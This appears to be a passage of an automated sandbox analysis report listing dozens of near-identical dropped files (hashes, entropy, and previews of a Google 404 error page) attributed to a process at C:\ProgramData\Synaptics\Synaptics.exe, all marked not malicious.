                                                                                                              Entropy (8bit):5.256049399502176
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0hSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+K+pAZewRDK4mW
                                                                                                              MD5:E56F03B2BA0408C0F51EBA501B2F591F
                                                                                                              SHA1:CE1B927CD6B151D84C9AD2C49A6D0D91F018D8E5
                                                                                                              SHA-256:33EFA1BC8798D4A539CA4A460A3727240C74A116E29B926AF1A74EB463D02024
                                                                                                              SHA-512:2C46456D86EAD4F69AE84DC12EAFDF874DBDBDE3BBF9A707699FAD2AE04E11873DBE969882EB3CAA83E909589D307ADB7E9AB2914B2143FD9AE01D83468E4AC3
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="i1_82FLPwH2s_nh3buPlCQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.265337420299849
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0ETDSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                              MD5:92DCDAD0134439DD771B11DF12B594D6
                                                                                                              SHA1:5565D50DDE6FF1995CF3208B9C4D4864309EAFA4
                                                                                                              SHA-256:8F15B312FC24D8F6772F8A45714055F6771EBA7C18493397AABDBDD707D8AA33
                                                                                                              SHA-512:61D922E1B7E58A1BDFA354F2A28EC9746E82D32B64FA0F9133ADBB2D30A9A4FE1AA5DB7231CDACD93E4FDFB75D46349D6FAD0FAB9694F30EBF83ED9CA5F72EDC
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rTO97OYnvc07NCBbVSiUSg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267887900174546
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0cSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+L+pAZewRDK4mW
                                                                                                              MD5:2DD51EC1B11A32BF78948214B0DEB3D4
                                                                                                              SHA1:63825AB2D976EA4963E5F2B88E298F75FFF7392A
                                                                                                              SHA-256:BB7D24EB8C199DC131995D5ABD39F0DEEE61C0C1CE8D5C3DA3C143FF06957738
                                                                                                              SHA-512:BDDE10F859795D424456D93F78E0B5629FF9396450458B902412369C98C09055C50EA836DEB91B4EA6A9A12D5D02AB61803E80FB8E734E3CCCC179019C796D7D
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QJKcfFb7FeLJr5CDhT21HA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.253096345946864
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xsSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+9+pAZewRDK4mW
                                                                                                              MD5:8192EB4F30AAC4F2939613A727AF1F61
                                                                                                              SHA1:2EA1812D19FB79D898899C766D08081E9C1238EA
                                                                                                              SHA-256:8D9FFABFBA5E01A2ECA4289A44BB2D64F9570224FE8F0739234CD24DEA8B4436
                                                                                                              SHA-512:362DD2F6A0D06560A42FC65CABDF5D0E167779164079972877007B2498B3671BA9450B7F84664FC227794B9CE081F6093DF5788F08427A5C4357AFDDFC9D9BA5
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="XbuUbln02VlW3dh5g792PA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2510507247028375
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+04SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7+pAZewRDK4mW
                                                                                                              MD5:391E7F42E5EDD38DFFEB113DAFC1EF0F
                                                                                                              SHA1:4BABA379CD3E0BC39C5B66FD7D199673699ECDD4
                                                                                                              SHA-256:FA41F0425298D022ED0FAAEC6D4C38E1C66DAF244A93D891464A85424607C65E
                                                                                                              SHA-512:770527EFCD2016874ED1A523A37433922148A71B42CB9E7725FA71AB3694589D05FBEEFD6C23C9DD8CA2D2CF3D8DD5D14DC7EFF9928E0D9E0A132E240DB3C861
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8-5M2uwYitoS_xaVfng_CA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267888749960688
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0hwzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+KU+pAZewRDK4mW
                                                                                                              MD5:2A5E9AE1849771643B12832DA6D89B53
                                                                                                              SHA1:31EBB5DC4C10F314FEBA4A9E15F986DB6F720973
                                                                                                              SHA-256:455B26AACF85FD58108947F864A967B4D8807BE912B4CF3D24421276779EB859
                                                                                                              SHA-512:D65E5A531D8B0D0B4E64E2F7B41E04AA50A5963E857072583FBBEAB951BA399BE6E201B9BC65167FE4DDA159CBE112C87C97B545357D381CE181A5B10306DC29
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="n2j2v73DAveUGKK4WfLbsQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.256671321399851
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0TrLRSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+e+pAZewRDK4mW
                                                                                                              MD5:D91B7FFC9FF19EC827B864DA4EC5C743
                                                                                                              SHA1:4AF89BEFC27BFBBD9898D7DAD944F43B66285014
                                                                                                              SHA-256:F7E1AE4B2A80E1F32D0E42E2383ACA549CB12B30068EB00856B06968558092EF
                                                                                                              SHA-512:30C79B5D5F8016B4A5B9DA32DBA5F7F29470B20191A8F71217E96B1257EDCC8E82E4704F086EA77B88D04FC3D30A3A1CB8347D1AB69B2671D450178A7AB70669
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="oSrzZNQLgkIA0sn8lxMycw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2733685108034996
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0m71SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p71+pAZewRDK4mW
                                                                                                              MD5:CABF0A09F77804FE64DAD5B9C8EA760A
                                                                                                              SHA1:34515B8539BE9B4344B8937A2C578BAAFE6DF8DB
                                                                                                              SHA-256:C58ED93736120CBBA723167279EABB5F2A7E4BAEC2677A0611866F83754E36BA
                                                                                                              SHA-512:938A715CBCF4BCCE4D82C44832A54C8C74422FA83B90620EE0D2E273BC6B2B66C157FD0FEA6EC2F33F9C364A3ED6012C869CC89BD9DF5910C8DDF5FAA6456477
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="v17mA4Y6R-OYVyRx33JlKQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.261950024786214
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0fC3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+D3+pAZewRDK4mW
                                                                                                              MD5:2FAC4C5878DFFDB40053BFF02B87D668
                                                                                                              SHA1:006F5DF111F17BD959F24ED757B5DD6AD0978DE2
                                                                                                              SHA-256:C3814A0CA4F97DAB38939A6771E838B08E39ADDD5B77D8688BD80F6F7161C8B0
                                                                                                              SHA-512:C4F8B17B065CB868DEDAC389F581B4BBA02C65D8617B00984D30A3AF018FDD755F6D7C4938E79B332ADDAF79838AE990B2F0FCACA3CED8017228D9A7E15926CB
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="B_gKefa2MoZmTUjMZwg_YA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.253139936205979
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0XbbSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+43+pAZewRDK4mW
                                                                                                              MD5:415835F2AB6668BAEF5BC9EBCD1BD96E
                                                                                                              SHA1:9D8429AFBD190726A0B0B36376D01C2EAB4250BC
                                                                                                              SHA-256:CA8A78A89F3173D3D9F513023BAD124833428DF4BC21C5F45549737CC8D48DD9
                                                                                                              SHA-512:82E56F4859DC10A74116F2140204388004730DC8BB91B8C58B0500D9137C9B1FDF44BAE361BCED0CB26E72DAF9F61DF63BA9DD9EED7C122BEFA40C45056718CC
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Ychchi9qLpmucugzQHPryQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267633915937188
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0xSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                              MD5:6B057F022B69CC2EFDB700A9CA83EE77
                                                                                                              SHA1:709E5AB0E80B5F7FDDF61766276F5D00FFB55EAD
                                                                                                              SHA-256:2E9257CC844174346ABA39DE554FC44440DC9D0474745F61840FEC495276E56E
                                                                                                              SHA-512:056DD891ED63A8C7497D4D23D2201634F636E246955A789365485A353B12CFF99AC8E47E1F439B4F54880DF778401DE945EC09CDDCB56C9735A5B5C7B917CB32
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="PnaLuRIObvXrsPYz5LOLkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.267486566715959
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0rSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+0+pAZewRDK4mW
                                                                                                              MD5:A0FAD609B69F3ABF516A6AE1E475DFEA
                                                                                                              SHA1:5D8AEAB17B8F2DE1FCC9443A1E1D61E27950B8CD
                                                                                                              SHA-256:D19044FDB8FD31A51DDC11D46F8F213909102378D8EBBC8D1CDB544DAF9B6199
                                                                                                              SHA-512:6B839B204BFA8718DBFDC55E6A158E6A447B6C44DCADA401B02E9C9146F65DF17117D220F614B1FFCBCCE7373CD6516767FE167AD94F240B25A1FE73D7D3EC71
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QgMP0YgsXON_QqY2V-uW1g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.27448390310628
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+02JzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+tp+pAZewRDK4mW
                                                                                                              MD5:F85E9C9E96897D6658FD5E209F4C0583
                                                                                                              SHA1:7F354382F35D0ED80D56208A3C39CDD0B73414EF
                                                                                                              SHA-256:AB2E824FE754B559BB3F5F15BB825BA520D3C47F01932A52DC0568CE8D5E2CFB
                                                                                                              SHA-512:76255846F2DAC276759CCF948247630CB2304751CAB8BED4821229E149E6760B55780B66B147D756794BFB0CF54D9F0761AFEB4B5EDDF6B2615AA1AE57430CAE
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="DiZwM9cH3aSA8Wz_CmWR6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.253828060035936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0MESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+dE+pAZewRDK4mW
                                                                                                              MD5:358CA0603192B27FBBF3EAD2939CAE5F
                                                                                                              SHA1:61C9C198B28B996BD00228FAE963FC881D6C1E90
                                                                                                              SHA-256:36AA07CB08AD44ADE26FBE0045055B402FE0BD93EEDC5590A5264A2CE942949F
                                                                                                              SHA-512:2FEA9CDB54AFAD69C5105590F0B0F843E3EAEDA8A8CAD180DF61869777F093D97B74227423A9A9C77E377A85C043901C043A126ACB36F5B0606CB553460116FD
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="rlL5mg-bCR3mgBoJRP9uxA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.2641292114336515
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0jSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+g+pAZewRDK4mW
                                                                                                              MD5:C878312E834E59228B874FEA86A5798D
                                                                                                              SHA1:94F3BC03A172D531E2E83EC7109BB4E9B5530655
                                                                                                              SHA-256:CF2866CB6BFD50C3E20C44CAB34390DD718BE45B2B7BEAD7895D8B86E464C555
                                                                                                              SHA-512:0D7ED8455A97829EFCBF895A317725B648152750CE365A08E82BDE2DCC3AD704F2A4ABBB386A7AE694F6A47F3FA0D5D0D571B74520D04B9C9E2C8226239BB176
                                                                                                              Malicious:false
                                                                                                              Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="A6WTX_nppKl7WG1yDta6uQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                              Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1652
                                                                                                              Entropy (8bit):5.246884259425936
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:GgsF+0VQSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+mQ+pAZewRDK4mW
                                                                                                              MD5:8F0EFF7D519004EA1596C9482630BA18
                                                                                                              SHA1:90C4524C93A6E4E27369F2427B1EADF73D75FB5E
                                                                                                              SHA-256:3BA1C9672DEB0F84D03F2066A193C8061922BD8118E5A30581C51EC6F237D31B
                                                                                                              SHA-512:8B098E63E24B59C9DE8CBEF0B0FF8F24B185705C646EFCC5626A261851D01DBE090F3A32A41E80626A7A488AAAC60973F62D676277B2148D964180FE5A0E3E15
                                                                                                              Malicious:false
